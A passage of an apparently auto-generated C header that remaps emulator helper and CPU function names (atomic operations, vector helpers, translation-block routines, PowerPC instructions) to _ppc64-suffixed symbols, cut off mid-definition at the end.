helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_ppc64 #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_ppc64 #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_ppc64 #define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_ppc64 #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_ppc64 #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_ppc64 #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_ppc64 #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_ppc64 #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_ppc64 #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_ppc64 #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_ppc64 #define helper_atomic_xchgq_le helper_atomic_xchgq_le_ppc64 #define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_ppc64 #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_ppc64 #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_ppc64 #define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_ppc64 #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_ppc64 #define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_ppc64 #define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_ppc64 #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_ppc64 #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_ppc64 #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_ppc64 #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_ppc64 #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_ppc64 #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_ppc64 #define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_ppc64 #define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_ppc64 #define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_ppc64 #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_ppc64 #define helper_atomic_xchgq_be helper_atomic_xchgq_be_ppc64 #define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_ppc64 #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_ppc64 #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_ppc64 #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_ppc64 #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_ppc64 #define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_ppc64 #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_ppc64 #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_ppc64 #define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_ppc64 #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_ppc64 #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_ppc64 #define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_ppc64 #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_ppc64 #define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_ppc64 #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_ppc64 #define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_ppc64 #define cpu_ldub_code cpu_ldub_code_ppc64 #define cpu_lduw_code cpu_lduw_code_ppc64 #define cpu_ldl_code cpu_ldl_code_ppc64 #define cpu_ldq_code cpu_ldq_code_ppc64 #define helper_div_i32 helper_div_i32_ppc64 #define helper_rem_i32 helper_rem_i32_ppc64 #define helper_divu_i32 helper_divu_i32_ppc64 #define helper_remu_i32 helper_remu_i32_ppc64 #define helper_shl_i64 helper_shl_i64_ppc64 #define helper_shr_i64 helper_shr_i64_ppc64 #define helper_sar_i64 helper_sar_i64_ppc64 #define helper_div_i64 helper_div_i64_ppc64 #define helper_rem_i64 helper_rem_i64_ppc64 #define helper_divu_i64 helper_divu_i64_ppc64 #define helper_remu_i64 helper_remu_i64_ppc64 #define helper_muluh_i64 helper_muluh_i64_ppc64 #define helper_mulsh_i64 helper_mulsh_i64_ppc64 #define helper_clz_i32 helper_clz_i32_ppc64 #define helper_ctz_i32 helper_ctz_i32_ppc64 #define helper_clz_i64 helper_clz_i64_ppc64 #define helper_ctz_i64 helper_ctz_i64_ppc64 #define helper_clrsb_i32 helper_clrsb_i32_ppc64 #define helper_clrsb_i64 helper_clrsb_i64_ppc64 #define helper_ctpop_i32 helper_ctpop_i32_ppc64 #define helper_ctpop_i64 helper_ctpop_i64_ppc64 #define helper_lookup_tb_ptr helper_lookup_tb_ptr_ppc64 #define helper_exit_atomic helper_exit_atomic_ppc64 #define helper_gvec_add8 helper_gvec_add8_ppc64 #define helper_gvec_add16 helper_gvec_add16_ppc64 #define helper_gvec_add32 helper_gvec_add32_ppc64 #define helper_gvec_add64 helper_gvec_add64_ppc64 #define helper_gvec_adds8 helper_gvec_adds8_ppc64 #define helper_gvec_adds16 helper_gvec_adds16_ppc64 #define helper_gvec_adds32 helper_gvec_adds32_ppc64 #define helper_gvec_adds64 helper_gvec_adds64_ppc64 #define helper_gvec_sub8 helper_gvec_sub8_ppc64 #define helper_gvec_sub16 helper_gvec_sub16_ppc64 #define helper_gvec_sub32 helper_gvec_sub32_ppc64 #define helper_gvec_sub64 helper_gvec_sub64_ppc64 #define helper_gvec_subs8 helper_gvec_subs8_ppc64 #define helper_gvec_subs16 helper_gvec_subs16_ppc64 #define helper_gvec_subs32 helper_gvec_subs32_ppc64 #define helper_gvec_subs64 helper_gvec_subs64_ppc64 #define helper_gvec_mul8 helper_gvec_mul8_ppc64 #define helper_gvec_mul16 helper_gvec_mul16_ppc64 #define helper_gvec_mul32 helper_gvec_mul32_ppc64 #define helper_gvec_mul64 helper_gvec_mul64_ppc64 #define helper_gvec_muls8 helper_gvec_muls8_ppc64 #define helper_gvec_muls16 helper_gvec_muls16_ppc64 #define helper_gvec_muls32 helper_gvec_muls32_ppc64 #define helper_gvec_muls64 helper_gvec_muls64_ppc64 #define helper_gvec_neg8 helper_gvec_neg8_ppc64 #define helper_gvec_neg16 helper_gvec_neg16_ppc64 #define helper_gvec_neg32 helper_gvec_neg32_ppc64 #define helper_gvec_neg64 helper_gvec_neg64_ppc64 #define helper_gvec_abs8 helper_gvec_abs8_ppc64 #define helper_gvec_abs16 helper_gvec_abs16_ppc64 #define helper_gvec_abs32 helper_gvec_abs32_ppc64 #define helper_gvec_abs64 helper_gvec_abs64_ppc64 #define helper_gvec_mov helper_gvec_mov_ppc64 #define helper_gvec_dup64 helper_gvec_dup64_ppc64 #define helper_gvec_dup32 helper_gvec_dup32_ppc64 #define helper_gvec_dup16 helper_gvec_dup16_ppc64 #define helper_gvec_dup8 helper_gvec_dup8_ppc64 #define helper_gvec_not helper_gvec_not_ppc64 #define helper_gvec_and helper_gvec_and_ppc64 #define helper_gvec_or helper_gvec_or_ppc64 #define helper_gvec_xor helper_gvec_xor_ppc64 #define helper_gvec_andc helper_gvec_andc_ppc64 #define helper_gvec_orc helper_gvec_orc_ppc64 #define helper_gvec_nand helper_gvec_nand_ppc64 #define helper_gvec_nor helper_gvec_nor_ppc64 #define helper_gvec_eqv helper_gvec_eqv_ppc64 #define helper_gvec_ands helper_gvec_ands_ppc64 #define helper_gvec_xors helper_gvec_xors_ppc64 #define helper_gvec_ors helper_gvec_ors_ppc64 #define helper_gvec_shl8i helper_gvec_shl8i_ppc64 #define helper_gvec_shl16i helper_gvec_shl16i_ppc64 #define helper_gvec_shl32i helper_gvec_shl32i_ppc64 #define helper_gvec_shl64i helper_gvec_shl64i_ppc64 #define helper_gvec_shr8i helper_gvec_shr8i_ppc64 #define helper_gvec_shr16i helper_gvec_shr16i_ppc64 #define helper_gvec_shr32i helper_gvec_shr32i_ppc64 #define helper_gvec_shr64i helper_gvec_shr64i_ppc64 #define helper_gvec_sar8i helper_gvec_sar8i_ppc64 #define helper_gvec_sar16i helper_gvec_sar16i_ppc64 #define helper_gvec_sar32i helper_gvec_sar32i_ppc64 #define helper_gvec_sar64i helper_gvec_sar64i_ppc64 #define helper_gvec_shl8v helper_gvec_shl8v_ppc64 #define helper_gvec_shl16v helper_gvec_shl16v_ppc64 #define helper_gvec_shl32v helper_gvec_shl32v_ppc64 #define helper_gvec_shl64v helper_gvec_shl64v_ppc64 #define helper_gvec_shr8v helper_gvec_shr8v_ppc64 #define helper_gvec_shr16v helper_gvec_shr16v_ppc64 #define helper_gvec_shr32v helper_gvec_shr32v_ppc64 #define helper_gvec_shr64v helper_gvec_shr64v_ppc64 #define helper_gvec_sar8v helper_gvec_sar8v_ppc64 #define helper_gvec_sar16v helper_gvec_sar16v_ppc64 #define helper_gvec_sar32v helper_gvec_sar32v_ppc64 #define helper_gvec_sar64v helper_gvec_sar64v_ppc64 #define helper_gvec_eq8 helper_gvec_eq8_ppc64 #define helper_gvec_ne8 helper_gvec_ne8_ppc64 #define helper_gvec_lt8 helper_gvec_lt8_ppc64 #define helper_gvec_le8 helper_gvec_le8_ppc64 #define helper_gvec_ltu8 helper_gvec_ltu8_ppc64 #define helper_gvec_leu8 helper_gvec_leu8_ppc64 #define helper_gvec_eq16 helper_gvec_eq16_ppc64 #define helper_gvec_ne16 helper_gvec_ne16_ppc64 #define helper_gvec_lt16 helper_gvec_lt16_ppc64 #define helper_gvec_le16 helper_gvec_le16_ppc64 #define helper_gvec_ltu16 helper_gvec_ltu16_ppc64 #define helper_gvec_leu16 helper_gvec_leu16_ppc64 #define helper_gvec_eq32 helper_gvec_eq32_ppc64 #define helper_gvec_ne32 helper_gvec_ne32_ppc64 #define helper_gvec_lt32 helper_gvec_lt32_ppc64 #define helper_gvec_le32 helper_gvec_le32_ppc64 #define helper_gvec_ltu32 helper_gvec_ltu32_ppc64 #define helper_gvec_leu32 helper_gvec_leu32_ppc64 #define helper_gvec_eq64 helper_gvec_eq64_ppc64 #define helper_gvec_ne64 helper_gvec_ne64_ppc64 #define helper_gvec_lt64 helper_gvec_lt64_ppc64 #define helper_gvec_le64 helper_gvec_le64_ppc64 #define helper_gvec_ltu64 helper_gvec_ltu64_ppc64 #define helper_gvec_leu64 helper_gvec_leu64_ppc64 #define helper_gvec_ssadd8 helper_gvec_ssadd8_ppc64 #define helper_gvec_ssadd16 helper_gvec_ssadd16_ppc64 #define helper_gvec_ssadd32 helper_gvec_ssadd32_ppc64 #define helper_gvec_ssadd64 helper_gvec_ssadd64_ppc64 #define helper_gvec_sssub8 helper_gvec_sssub8_ppc64 #define helper_gvec_sssub16 helper_gvec_sssub16_ppc64 #define helper_gvec_sssub32 helper_gvec_sssub32_ppc64 #define helper_gvec_sssub64 helper_gvec_sssub64_ppc64 #define helper_gvec_usadd8 helper_gvec_usadd8_ppc64 #define helper_gvec_usadd16 helper_gvec_usadd16_ppc64 #define helper_gvec_usadd32 helper_gvec_usadd32_ppc64 #define helper_gvec_usadd64 helper_gvec_usadd64_ppc64 #define helper_gvec_ussub8 helper_gvec_ussub8_ppc64 #define helper_gvec_ussub16 helper_gvec_ussub16_ppc64 #define helper_gvec_ussub32 helper_gvec_ussub32_ppc64 #define helper_gvec_ussub64 helper_gvec_ussub64_ppc64 #define helper_gvec_smin8 helper_gvec_smin8_ppc64 #define helper_gvec_smin16 helper_gvec_smin16_ppc64 #define helper_gvec_smin32 helper_gvec_smin32_ppc64 #define helper_gvec_smin64 helper_gvec_smin64_ppc64 #define helper_gvec_smax8 helper_gvec_smax8_ppc64 #define helper_gvec_smax16 helper_gvec_smax16_ppc64 #define helper_gvec_smax32 helper_gvec_smax32_ppc64 #define helper_gvec_smax64 helper_gvec_smax64_ppc64 #define helper_gvec_umin8 helper_gvec_umin8_ppc64 #define helper_gvec_umin16 helper_gvec_umin16_ppc64 #define helper_gvec_umin32 helper_gvec_umin32_ppc64 #define helper_gvec_umin64 helper_gvec_umin64_ppc64 #define helper_gvec_umax8 helper_gvec_umax8_ppc64 #define helper_gvec_umax16 helper_gvec_umax16_ppc64 #define helper_gvec_umax32 helper_gvec_umax32_ppc64 #define helper_gvec_umax64 helper_gvec_umax64_ppc64 #define helper_gvec_bitsel helper_gvec_bitsel_ppc64 #define cpu_restore_state cpu_restore_state_ppc64 #define page_collection_lock page_collection_lock_ppc64 #define page_collection_unlock page_collection_unlock_ppc64 #define free_code_gen_buffer free_code_gen_buffer_ppc64 #define tcg_exec_init tcg_exec_init_ppc64 #define tb_cleanup tb_cleanup_ppc64 #define tb_flush tb_flush_ppc64 #define tb_phys_invalidate tb_phys_invalidate_ppc64 #define tb_gen_code tb_gen_code_ppc64 #define tb_exec_lock tb_exec_lock_ppc64 #define tb_exec_unlock tb_exec_unlock_ppc64 #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_ppc64 #define tb_invalidate_phys_range tb_invalidate_phys_range_ppc64 #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_ppc64 #define tb_check_watchpoint tb_check_watchpoint_ppc64 #define cpu_io_recompile cpu_io_recompile_ppc64 #define tb_flush_jmp_cache tb_flush_jmp_cache_ppc64 #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_ppc64 #define translator_loop_temp_check translator_loop_temp_check_ppc64 #define translator_loop translator_loop_ppc64 #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_ppc64 #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_ppc64 #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_ppc64 #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_ppc64 #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_ppc64 #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_ppc64 #define unassigned_mem_ops unassigned_mem_ops_ppc64 #define floatx80_infinity floatx80_infinity_ppc64 #define dup_const_func dup_const_func_ppc64 #define gen_helper_raise_exception gen_helper_raise_exception_ppc64 #define gen_helper_raise_interrupt gen_helper_raise_interrupt_ppc64 #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_ppc64 #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_ppc64 #define gen_helper_cpsr_read gen_helper_cpsr_read_ppc64 #define gen_helper_cpsr_write gen_helper_cpsr_write_ppc64 #define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_ppc64 #define ppc_cpu_unrealize ppc_cpu_unrealize_ppc64 #define ppc_cpu_instance_finalize ppc_cpu_instance_finalize_ppc64 #define ppc_cpu_do_interrupt ppc_cpu_do_interrupt_ppc64 #define ppc_cpu_do_system_reset ppc_cpu_do_system_reset_ppc64 #define ppc_cpu_do_fwnmi_machine_check ppc_cpu_do_fwnmi_machine_check_ppc64 #define ppc_cpu_exec_interrupt ppc_cpu_exec_interrupt_ppc64 #define raise_exception_err_ra raise_exception_err_ra_ppc64 #define raise_exception_err raise_exception_err_ppc64 #define raise_exception raise_exception_ppc64 #define raise_exception_ra raise_exception_ra_ppc64 #define helper_raise_exception_err helper_raise_exception_err_ppc64 #define helper_store_msr helper_store_msr_ppc64 #define helper_rfi helper_rfi_ppc64 #define helper_40x_rfci helper_40x_rfci_ppc64 #define helper_rfdi helper_rfdi_ppc64 #define helper_rfci helper_rfci_ppc64 #define helper_rfmci helper_rfmci_ppc64 #define helper_tw helper_tw_ppc64 #define helper_rfsvc helper_rfsvc_ppc64 #define helper_msgclr helper_msgclr_ppc64 #define helper_msgsnd helper_msgsnd_ppc64 #define helper_book3s_msgclr helper_book3s_msgclr_ppc64 #define ppc_cpu_do_unaligned_access ppc_cpu_do_unaligned_access_ppc64 #define helper_divweu helper_divweu_ppc64 #define helper_divwe helper_divwe_ppc64 #define helper_sraw helper_sraw_ppc64 #define helper_popcntb helper_popcntb_ppc64 #define helper_div helper_div_ppc64 #define helper_divo helper_divo_ppc64 #define helper_divs helper_divs_ppc64 #define helper_divso helper_divso_ppc64 #define helper_602_mfrom helper_602_mfrom_ppc64 #define helper_mtvscr helper_mtvscr_ppc64 #define helper_vaddcuw helper_vaddcuw_ppc64 #define helper_vprtybw helper_vprtybw_ppc64 #define helper_vprtybd helper_vprtybd_ppc64 #define helper_vprtybq helper_vprtybq_ppc64 #define helper_vmuluwm helper_vmuluwm_ppc64 #define helper_vaddfp helper_vaddfp_ppc64 #define helper_vsubfp helper_vsubfp_ppc64 #define helper_vminfp helper_vminfp_ppc64 #define helper_vmaxfp helper_vmaxfp_ppc64 #define helper_vmaddfp helper_vmaddfp_ppc64 #define helper_vnmsubfp helper_vnmsubfp_ppc64 #define helper_vaddsbs helper_vaddsbs_ppc64 #define helper_vsubsbs helper_vsubsbs_ppc64 #define helper_vsubshs helper_vsubshs_ppc64 #define helper_vaddsws helper_vaddsws_ppc64 #define helper_vsubsws helper_vsubsws_ppc64 #define helper_vaddubs helper_vaddubs_ppc64 #define helper_vsububs helper_vsububs_ppc64 #define helper_vadduhs helper_vadduhs_ppc64 #define helper_vsubuhs helper_vsubuhs_ppc64 #define helper_vadduws helper_vadduws_ppc64 #define helper_vsubuws helper_vsubuws_ppc64 #define helper_vavgsb helper_vavgsb_ppc64 #define helper_vavgub helper_vavgub_ppc64 #define helper_vavgsh helper_vavgsh_ppc64 #define helper_vavguh helper_vavguh_ppc64 #define helper_vavgsw helper_vavgsw_ppc64 #define helper_vabsdub helper_vabsdub_ppc64 #define helper_vabsduh helper_vabsduh_ppc64 #define helper_vabsduw helper_vabsduw_ppc64 #define helper_vcfux helper_vcfux_ppc64 #define helper_vcfsx helper_vcfsx_ppc64 #define helper_vcmpequb helper_vcmpequb_ppc64 #define helper_vcmpequb_dot helper_vcmpequb_dot_ppc64 #define helper_vcmpequw helper_vcmpequw_ppc64 #define helper_vcmpequw_dot helper_vcmpequw_dot_ppc64 #define helper_vcmpequd helper_vcmpequd_ppc64 #define helper_vcmpequd_dot helper_vcmpequd_dot_ppc64 #define helper_vcmpgtub helper_vcmpgtub_ppc64 #define helper_vcmpgtub_dot helper_vcmpgtub_dot_ppc64 #define helper_vcmpgtuh helper_vcmpgtuh_ppc64 #define helper_vcmpgtuh_dot helper_vcmpgtuh_dot_ppc64 #define helper_vcmpgtuw helper_vcmpgtuw_ppc64 #define helper_vcmpgtuw_dot helper_vcmpgtuw_dot_ppc64 #define helper_vcmpgtud helper_vcmpgtud_ppc64 #define helper_vcmpgtud_dot helper_vcmpgtud_dot_ppc64 #define helper_vcmpgtud helper_vcmpgtud_ppc64 #define helper_vcmpgtud_dot helper_vcmpgtud_dot_ppc64 #define helper_vcmpgtsb helper_vcmpgtsb_ppc64 #define helper_vcmpgtsb_dot helper_vcmpgtsb_dot_ppc64 #define helper_vcmpgtsh helper_vcmpgtsh_ppc64 #define helper_vcmpgtsh_dot helper_vcmpgtsh_dot_ppc64 #define helper_vcmpgtsw helper_vcmpgtsw_ppc64 #define helper_vcmpgtsw_dot helper_vcmpgtsw_dot_ppc64 #define helper_vcmpgtsd helper_vcmpgtsd_ppc64 #define helper_vcmpgtsd_dot helper_vcmpgtsd_dot_ppc64 #define helper_vcmpnezb helper_vcmpnezb_ppc64 #define helper_vcmpnezb_dot helper_vcmpnezb_dot_ppc64 #define helper_vcmpnezb helper_vcmpnezb_ppc64 #define helper_vcmpnezb_dot helper_vcmpnezb_dot_ppc64 #define helper_vcmpnezw helper_vcmpnezw_ppc64 #define helper_vcmpnezw_dot helper_vcmpnezw_dot_ppc64 #define helper_vcmpneb helper_vcmpneb_ppc64 #define helper_vcmpneb_dot helper_vcmpneb_dot_ppc64 #define helper_vcmpneb helper_vcmpneb_ppc64 #define helper_vcmpneb_dot helper_vcmpneb_dot_ppc64 #define helper_vcmpneh helper_vcmpneh_ppc64 #define helper_vcmpneh_dot helper_vcmpneh_dot_ppc64 #define helper_vcmpnew helper_vcmpnew_ppc64 #define helper_vcmpnew_dot helper_vcmpnew_dot_ppc64 #define helper_vcmpeqfp helper_vcmpeqfp_ppc64 #define helper_vcmpeqfp_dot helper_vcmpeqfp_dot_ppc64 #define helper_vcmpgefp helper_vcmpgefp_ppc64 #define helper_vcmpgefp_dot helper_vcmpgefp_dot_ppc64 #define helper_vcmpgtfp helper_vcmpgtfp_ppc64 #define helper_vcmpgtfp_dot helper_vcmpgtfp_dot_ppc64 #define helper_vcmpbfp helper_vcmpbfp_ppc64 #define helper_vcmpbfp_dot helper_vcmpbfp_dot_ppc64 #define helper_vcmpbfp helper_vcmpbfp_ppc64 #define helper_vcmpbfp_dot helper_vcmpbfp_dot_ppc64 #define helper_vctuxs helper_vctuxs_ppc64 #define helper_vctsxs helper_vctsxs_ppc64 #define helper_vclzlsbb helper_vclzlsbb_ppc64 #define helper_vctzlsbb helper_vctzlsbb_ppc64 #define helper_vmhaddshs helper_vmhaddshs_ppc64 #define helper_vmhraddshs helper_vmhraddshs_ppc64 #define helper_vmladduhm helper_vmladduhm_ppc64 #define helper_vmhraddshs helper_vmhraddshs_ppc64 #define helper_vmladduhm helper_vmladduhm_ppc64 #define helper_vmrglb helper_vmrglb_ppc64 #define helper_vmrghb helper_vmrghb_ppc64 #define helper_vmrglh helper_vmrglh_ppc64 #define helper_vmrghh helper_vmrghh_ppc64 #define helper_vmrglw helper_vmrglw_ppc64 #define helper_vmrghw helper_vmrghw_ppc64 #define helper_vmsummbm helper_vmsummbm_ppc64 #define helper_vmsumshs helper_vmsumshs_ppc64 #define helper_vmsumubm helper_vmsumubm_ppc64 #define helper_vmsumuhm helper_vmsumuhm_ppc64 #define helper_vmulesb helper_vmulesb_ppc64 #define helper_vmulosb helper_vmulosb_ppc64 #define helper_vmulesh helper_vmulesh_ppc64 #define helper_vmulesw helper_vmulesw_ppc64 #define helper_vmuleub helper_vmuleub_ppc64 #define helper_vmuloub helper_vmuloub_ppc64 #define helper_vmuleuh helper_vmuleuh_ppc64 #define helper_vmulouh helper_vmulouh_ppc64 #define helper_vmuleuw helper_vmuleuw_ppc64 #define helper_vmulouw helper_vmulouw_ppc64 #define helper_vperm helper_vperm_ppc64 #define helper_vpermr helper_vpermr_ppc64 #define helper_vbpermd helper_vbpermd_ppc64 #define helper_vpmsumb helper_vpmsumb_ppc64 #define helper_vpmsumh helper_vpmsumh_ppc64 #define helper_vpmsumw helper_vpmsumw_ppc64 #define helper_vpmsumd helper_vpmsumd_ppc64 #define helper_vpkpx helper_vpkpx_ppc64 #define helper_vpkshss helper_vpkshss_ppc64 #define helper_vpkshus helper_vpkshus_ppc64 #define helper_vpkswss helper_vpkswss_ppc64 #define helper_vpkswus helper_vpkswus_ppc64 #define helper_vpksdss helper_vpksdss_ppc64 #define helper_vpksdus helper_vpksdus_ppc64 #define helper_vpkuhus helper_vpkuhus_ppc64 #define helper_vpkuwus helper_vpkuwus_ppc64 #define helper_vpkudus helper_vpkudus_ppc64 #define helper_vpkuhum helper_vpkuhum_ppc64 #define helper_vpkuwum helper_vpkuwum_ppc64 #define helper_vpkudum helper_vpkudum_ppc64 #define helper_vrefp helper_vrefp_ppc64 #define helper_vrfin helper_vrfin_ppc64 #define helper_vrfim helper_vrfim_ppc64 #define helper_vrfip helper_vrfip_ppc64 #define helper_vrfiz helper_vrfiz_ppc64 #define helper_vrlb helper_vrlb_ppc64 #define helper_vrlh helper_vrlh_ppc64 #define helper_vrlw helper_vrlw_ppc64 #define helper_vrld helper_vrld_ppc64 #define helper_vrsqrtefp helper_vrsqrtefp_ppc64 #define helper_vrldmi helper_vrldmi_ppc64 #define helper_vrlwmi helper_vrlwmi_ppc64 #define helper_vrldnm helper_vrldnm_ppc64 #define helper_vrlwnm helper_vrlwnm_ppc64 #define helper_vsel helper_vsel_ppc64 #define helper_vexptefp helper_vexptefp_ppc64 #define helper_vlogefp helper_vlogefp_ppc64 #define helper_vextublx helper_vextublx_ppc64 #define helper_vextuhlx helper_vextuhlx_ppc64 #define helper_vextuwlx helper_vextuwlx_ppc64 #define helper_vextubrx helper_vextubrx_ppc64 #define helper_vextuhrx helper_vextuhrx_ppc64 #define helper_vextuwrx helper_vextuwrx_ppc64 #define helper_vslv helper_vslv_ppc64 #define helper_vsrv helper_vsrv_ppc64 #define helper_vsldoi helper_vsldoi_ppc64 #define helper_vslo helper_vslo_ppc64 #define helper_vinsertb helper_vinsertb_ppc64 #define helper_vinserth helper_vinserth_ppc64 #define helper_vinsertw helper_vinsertw_ppc64 #define helper_vinsertd helper_vinsertd_ppc64 #define helper_vextractub helper_vextractub_ppc64 #define helper_vextractuh helper_vextractuh_ppc64 #define helper_vextractuw helper_vextractuw_ppc64 #define helper_vextractd helper_vextractd_ppc64 #define helper_xxextractuw helper_xxextractuw_ppc64 #define helper_xxinsertw helper_xxinsertw_ppc64 #define helper_vextsb2w helper_vextsb2w_ppc64 #define helper_vextsb2d helper_vextsb2d_ppc64 #define helper_vextsh2w helper_vextsh2w_ppc64 #define helper_vextsh2d helper_vextsh2d_ppc64 #define helper_vnegw helper_vnegw_ppc64 #define helper_vnegd helper_vnegd_ppc64 #define helper_vsro helper_vsro_ppc64 #define helper_vsubcuw helper_vsubcuw_ppc64 #define helper_vsumsws helper_vsumsws_ppc64 #define helper_vsum2sws helper_vsum2sws_ppc64 #define helper_vsum4sbs helper_vsum4sbs_ppc64 #define helper_vsum4shs helper_vsum4shs_ppc64 #define helper_vsum4ubs helper_vsum4ubs_ppc64 #define helper_vupklpx helper_vupklpx_ppc64 #define helper_vupkhpx helper_vupkhpx_ppc64 #define helper_vupkhsb helper_vupkhsb_ppc64 #define helper_vupkhsh helper_vupkhsh_ppc64 #define helper_vupkhsw helper_vupkhsw_ppc64 #define helper_vupklsb helper_vupklsb_ppc64 #define helper_vupklsh helper_vupklsh_ppc64 #define helper_vupklsw helper_vupklsw_ppc64 #define helper_vclzb helper_vclzb_ppc64 #define helper_vclzh helper_vclzh_ppc64 #define helper_vctzb helper_vctzb_ppc64 #define helper_vctzh helper_vctzh_ppc64 #define helper_vctzw helper_vctzw_ppc64 #define helper_vctzd helper_vctzd_ppc64 #define helper_vpopcntb helper_vpopcntb_ppc64 #define helper_vpopcnth helper_vpopcnth_ppc64 #define helper_vpopcntw helper_vpopcntw_ppc64 #define helper_vpopcntd helper_vpopcntd_ppc64 #define helper_vadduqm helper_vadduqm_ppc64 #define helper_vaddeuqm helper_vaddeuqm_ppc64 #define helper_vaddcuq helper_vaddcuq_ppc64 #define helper_vaddecuq helper_vaddecuq_ppc64 #define helper_vsubuqm helper_vsubuqm_ppc64 #define helper_vsubeuqm helper_vsubeuqm_ppc64 #define helper_vsubcuq helper_vsubcuq_ppc64 #define helper_vsubecuq helper_vsubecuq_ppc64 #define helper_bcdadd helper_bcdadd_ppc64 #define helper_bcdsub helper_bcdsub_ppc64 #define helper_bcdcfn helper_bcdcfn_ppc64 #define helper_bcdctn helper_bcdctn_ppc64 #define helper_bcdcfz helper_bcdcfz_ppc64 #define helper_bcdctz helper_bcdctz_ppc64 #define helper_bcdcfsq helper_bcdcfsq_ppc64 #define helper_bcdctsq helper_bcdctsq_ppc64 #define helper_bcdcpsgn helper_bcdcpsgn_ppc64 #define helper_bcdsetsgn helper_bcdsetsgn_ppc64 #define helper_bcds helper_bcds_ppc64 #define helper_bcdus helper_bcdus_ppc64 #define helper_bcdsr helper_bcdsr_ppc64 #define helper_bcdtrunc helper_bcdtrunc_ppc64 #define helper_bcdutrunc helper_bcdutrunc_ppc64 #define helper_vsbox helper_vsbox_ppc64 #define helper_vcipher helper_vcipher_ppc64 #define helper_vcipherlast helper_vcipherlast_ppc64 #define helper_vncipher helper_vncipher_ppc64 #define helper_vncipherlast helper_vncipherlast_ppc64 #define helper_vshasigmaw helper_vshasigmaw_ppc64 #define helper_vshasigmad helper_vshasigmad_ppc64 #define helper_vpermxor helper_vpermxor_ppc64 #define helper_brinc helper_brinc_ppc64 #define helper_cntlsw32 helper_cntlsw32_ppc64 #define helper_cntlzw32 helper_cntlzw32_ppc64 #define helper_dlmzb helper_dlmzb_ppc64 #define helper_lmw helper_lmw_ppc64 #define helper_lsw helper_lsw_ppc64 #define helper_lswx helper_lswx_ppc64 #define helper_stsw helper_stsw_ppc64 #define helper_dcbz helper_dcbz_ppc64 #define helper_dcbzep helper_dcbzep_ppc64 #define helper_icbi helper_icbi_ppc64 #define helper_icbiep helper_icbiep_ppc64 #define helper_lscbx helper_lscbx_ppc64 #define helper_lvebx helper_lvebx_ppc64 #define helper_lvehx helper_lvehx_ppc64 #define helper_lvewx helper_lvewx_ppc64 #define helper_stvebx helper_stvebx_ppc64 #define helper_stvehx helper_stvehx_ppc64 #define helper_stvewx helper_stvewx_ppc64 #define helper_tbegin helper_tbegin_ppc64 #define helper_load_dump_spr helper_load_dump_spr_ppc64 #define helper_store_dump_spr helper_store_dump_spr_ppc64 #define helper_hfscr_facility_check helper_hfscr_facility_check_ppc64 #define helper_fscr_facility_check helper_fscr_facility_check_ppc64 #define helper_msr_facility_check helper_msr_facility_check_ppc64 #define helper_store_sdr1 helper_store_sdr1_ppc64 #define helper_store_pidr helper_store_pidr_ppc64 #define helper_store_lpidr helper_store_lpidr_ppc64 #define helper_store_hid0_601 helper_store_hid0_601_ppc64 #define helper_store_403_pbr helper_store_403_pbr_ppc64 #define helper_store_40x_dbcr0 helper_store_40x_dbcr0_ppc64 #define helper_store_40x_sler helper_store_40x_sler_ppc64 #define helper_clcs helper_clcs_ppc64 #define ppc_store_msr ppc_store_msr_ppc64 #define 